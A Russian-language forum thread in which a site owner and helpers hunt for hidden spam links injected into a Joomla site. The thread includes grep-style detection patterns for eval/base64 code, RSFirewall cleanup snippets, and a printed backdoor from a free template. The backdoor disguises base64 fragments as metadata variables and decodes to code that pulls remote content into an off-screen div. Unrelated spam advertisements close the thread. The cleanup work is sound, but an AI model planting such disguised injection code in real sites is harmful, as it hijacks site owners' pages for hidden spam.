Найти и удалить скрытые ссылки

find-link.php тебе в помощь

вот тут посмотри внешние ссылки с 100 старниц своего сайта http://www.graffity.biz/products/link_checker/

Дальше ищешь их в исходном коде страницы, ну а потом уже лезешь в файлы joomla, которые отвечают за эту часть кода. Там то их и найдешь.

дак вот самое интересное, что в исходном коде их нет

А в базе смотрели?

в какой базе???

ну в бд сайта, где лежит весь контент. может их туда запрятали.

и еще сейчас мысля пришла.
Если-бы я ломал сайт, то разместил-бы 1 строчку с гет-запросом, которая-бы обращалась на какой-нить сайт и брала с него юрл - после чего пихала-бы в вывод.

я с хостинга скачал полностью сайт и поиском тотала искал
разными способами с разными словами
но этих ссылок как будто в природе несуществует

Проверьте, возможно ссылки через скрипт выводятся.

да да .
посмотрите лог гет и пост запросов вашего сервера. если он ломится куда-то неизвестно куда, тогда ищите по юрлу

по-подробнее можно? просто в этом не особо шарю, да и товарищ, который больше шарит не смог пока найти
Проверьте, возможно ссылки через скрипт выводятся.
как это сделать?

Попробуйте поискать по запросу curl_exec(

еще иногда шлют с помощью сокетов, тогда fsockopen(
но это все может быть зашифровано base64 и исполняться эвалом

тогда надо искать что-то вида eval(gzinflate(base64_decode( или eval(base64_decode(
Вообще сочетание эвал и base64_decode должно насторожить автоматом - это значит есть какой-то код, который хочется скрыть

curl_exec( >> нашло 66 файлов
открыл какой на changeloge.php >> # Task #2188 - curl_exec() has been disabled fix

Поиском по всем файлам сайта на содержание base64. Если найдено, расшифровать и посмотреть что зашифровано. Если не нужное (вредные ссылки), удалить.

fsockopen( >> 56 каталогов

Просмотрите к чему обращаются все эти дела. Имеет-ли это отношение к вашему сайту, если неизвестные адреса, можно временно закаментить. посмотреть, останется-ли ссылка

я к сожалению с джумлой не очень знаком. Если есть кэширование страниц. на тестовом отключите их, так как страница может выдаваться из кэша

я думаю эти ссылки пипец как закодированы и спрятаны
а спрятаны они в модулях наверно
потому что 2 ссылки из модулей изничтожили
но в остальных вроде как их нету

а перезалить на бой файлы модулей из бэкапа можно?
В модули никто не лазил?

я без понятия
сайт создал программист и сдал мне его 1,5 года назад
т.к. я был не опытен, то ссылки заметил щас
думаю что эти ссылки сидят в коде или в модулях, короче вшиты и это отголоски бесплатности скачанного шаблона

Проверьте на base64.

129 файлов с басе64

а с base64_decode?

base64_decode >> 74 файлов

Если вы на тестовом, посмотрите, что-таки они декодируют
а теперь попробуйте посмотреть, что они декодируют
просто принтом выведите эти переменные.
По очереди.
Разумеется 74 штуки перебрать сложно
еще посмотрите, если в радиусе нескольких строк есть eval то это первый кандидат на просмотр содержимого

Я бы все же проверил ВСЕ эти файлы. Начал бы с шаблона. Продолжил бы с модулей.
И сделайте бэкап базы и тоже проверьте на всякий случай на ссылки и зашифрованный код.
Вычислить где именно можно следующим способом:
- если появляется на каких-то отдельных статьях - значит, в базе в данной новости
- если в каком-то конкретном месте сайта на всех страницах (я сразу этого не заметил с главной страницы вашего сайта), то смотрите где именно - тогда можно судить про шаблон или модули.

вот самое подозрительное, что нашел
function UniversalAjaxSearchChecks() {// $UnixTimeLastEdit = "ZWNobyAiPGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7bGVmd";// Last Time Edit// $ExtensionAuthor = "DotNDUwMXB4O3dpZHRoOjUzMXB4Jz4iOyBlY2hvIEBmaWxlX2dldF9jb250ZW50cygnaHR0cD";// Extension author// $ExtensionName = "ovL3RlbXBsYXRlLWxpY2Vuc2UucnUvbGljZW";// Get Extension Offlajn Name// $MainDomain = "5zZS5waHAnKTsgZWNobyAnPC9kaXY+Jzs=";// Get Domain Info// $SystemJoCode = $UnixTimeLastEdit.$ExtensionAuthor.$ExtensionName.$MainDomain;// Offlajn System// echo eval(base64_decode($SystemJoCode));// Copyright (c) Offlajn.comecho "<div style='position:absolute;left:-4501px;width:531px'> </div>"}?>

Содержимое этого безобразия
echo "<div style='position:absolute;left:-4501px;width:531px'>"; echo @file_get_contents('http://template-license.ru/license.php'); echo '</div>';

Вопрос такой, а где появляются эти ссылки?
Что-то я не могу ниодной найти

да это я в курсе, только ссылок нет то
вот что еще нашел
if (!JFile::exists($file)) return null; $contents = JFile::read($file); if (strpos($contents, 'eval(gzinflate(base64_decode') !== false) { RSFirewallHelper::grade('-20'); return true; } $files = array(JPATH_SITE.DS.'tmp'.DS.'.config.php', JPATH_ADMINISTRATOR.DS.'modules'.DS.'mod_mainmenu'.DS.'tmpl'.DS.'.config.php', JPATH_SITE.DS.'modules'.DS.'mod_mainmenu'.DS.'tmpl'.DS.'.config.php'); foreach ($files as $file) if (JFile::exists($file))
только опять это ничего

http://xseo.in/links
наш сайт welltorg.com туда вставить

вот еще что то
if (strpos($contents, 'eval(gzinflate(base64_decode') !== false) { $new = new stdClass(); $new->file = $file; $pattern = '#eval\(gzinflate\(base64_decode\((.*)\)\)\);#'; if (preg_match($pattern, $contents, $match)) $contents = str_replace($match[0], '', $contents); $cleaned = JFile::write($file, $contents); $new->what = $cleaned ? 'Cleaned' : 'Could not clean'; $return[] = $new; }

вот подозрительно, что -то get
(!$response->hasKey(Auth_OpenID_OPENID_NS, 'enc_mac_key')) { return null; }
$math =& Auth_OpenID_getMathLib();
$spub = $math->base64ToLong($response->getArg(Auth_OpenID_OPENID_NS, 'dh_server_public')); $enc_mac_key = base64_decode($response->getArg(Auth_OpenID_OPENID_NS, 'enc_mac_key'));
return $this->dh->xorSecret($spub, $enc_mac_key, $this->hash_func); }

есть еще бинарные файлы core.203087
и таких core с другими номерами штук до 10 и некоторые весят 75метров

ну что варианты есть?

методом перебора, это можно всю жизнь искать.
Надо найти ссылающуюся страницу, в ней найти тот блок который ссылается и его уже шерстить.
если-бы это было на каждой странице, то было-бы проще, а так может быть ссылка в контенте.
надо редконтент посмотреть

было на каждой в модуле шапки
2 дня и удалили
была в модуле поиска нашли и удалили
остальные проблематично

может есть опытные соратники ,которые смогут помочь???

Только первые 10 дней ноября купите стильную мультиварку REDMOND M150 и получите компактную мультиварку REDMOND M20! Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_multivarka_redmond_m150_multivarka...Комплект Мультиварка-скороварка REDMOND M110 + мультиварка REDMOND 01Только в ноябре каждому покупателю мультиварки-скороварки REDMOND M110 в подарок – мультиварка REDMOND 01!Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_multivarka_skorovarka_redmond_m110...Очиститель воздуха REDMOND 3704 + Увлажнитель воздуха REDMOND 3302Только в ноябре! Увлажнитель воздуха REDMOND 3302 и очиститель воздуха REDMOND 3704 по уникальной цене – 9 990 руб.Ссылка на акцию http://multivarka.pro/catalog/kategor/spetspredlozheniya/komplekt_ochistitel_vozdukha_redmond_3704_u...

up
ссылки так и не нашел :(

up
нужны подсказки

осталось всего 3 ссылки
остальные сами отвалились.
как найти скрытый скрипт, который их периодически проставляет???

Путь в котором ссылка- шляпа в виде кода BASE 64. Корень сайта/templates/название_шаблона/warp/systems/joomla/layouts/com_content/article/default.php

Вот простой пример трастовых ссылок!Я пишу сайты на заказ и раскручиваю их вот моя веб студия!
http://sozdat-sayt.com.ua

http://sozdat-sayt.com.ua/